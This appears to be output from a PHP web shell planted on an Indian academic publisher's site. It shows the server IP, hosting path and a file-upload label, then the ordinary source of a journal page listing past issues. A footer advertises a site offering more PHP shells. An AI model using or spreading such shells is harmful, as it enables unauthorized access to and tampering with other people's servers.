Domain: amberpublishers.in
Server Adress: 86.38.243.169

privdayz.com

/home/u866425823/domains/amberpublishers.in/public_html/ijsri/
Dosya Yükle :
Current File : /home/u866425823/domains/amberpublishers.in/public_html/ijsri/past_issue.php

<?php
require_once '../admin/include/db.php';
require_once 'functions.php';

// Get the current issue
$currentIssue = getLatestIssue($conn);

// Get the past issues excluding the current one
$pastIssues = getPastIssuesExcludingCurrent($conn, $currentIssue['issue_id']);
?>

<!DOCTYPE html>
<html lang="en">

<?php include 'common/head.php'; ?>

<body>
    <?php include 'common/header.php'; ?>

    <main id="main">

        <!-- ======= Breadcrumbs Section ======= -->
        <section class="breadcrumbs">
            <div class="container">
                <div class="d-flex justify-content-between align-items-center">
                    <h2 class="fw-bold">Past Issues</h2>
                    <ol>
                        <li><a href="index.php">Home</a></li>
                        <li>Past Issues</li>
                    </ol>
                </div>
            </div>
        </section><!-- End Breadcrumbs Section -->

        <!-- List of Past Volumes and Issues -->
        <section class="past-issues">
            <div class="container p-5" style="background-color: #fafafa;">
                <div class="row">
                    <div class="col-lg-12">
                        <h4 class="fw-bold mb-4">Past Issues</h4>

                        <?php if (!empty($pastIssues)) : ?>
                            <ul class="list-group">
                                <?php foreach ($pastIssues as $pastIssue) : ?>
                                    <li class="list-group-item">
                                        <a href="issue_details.php?issue_id=<?php echo $pastIssue['issue_id']; ?>" class="text-decoration-none">
                                            <span class="fw-bold">Volume <?php echo $pastIssue['volume_number']; ?></span> | <?php echo $pastIssue['issue_number']; ?> | <?php echo date('F Y', strtotime($pastIssue['publication_date'])); ?>
                                        </a>
                                    </li>
                                <?php endforeach; ?>
                            </ul>
                        <?php else : ?>
                            <p class="text-muted">No past issues found.</p>
                        <?php endif; ?>

                    </div>
                </div>
            </div>
        </section><!-- End Past Issues Section -->

    </main><!-- End #main -->

    <!-- ======= Footer ======= -->
    <?php include 'common/footer.php'; ?>
    <!-- End Footer -->

    <?php include 'common/scripts.php'; ?>
</body>

</html>

coded by Privdayz.com - Visit https://privdayz.com/ for more php shells.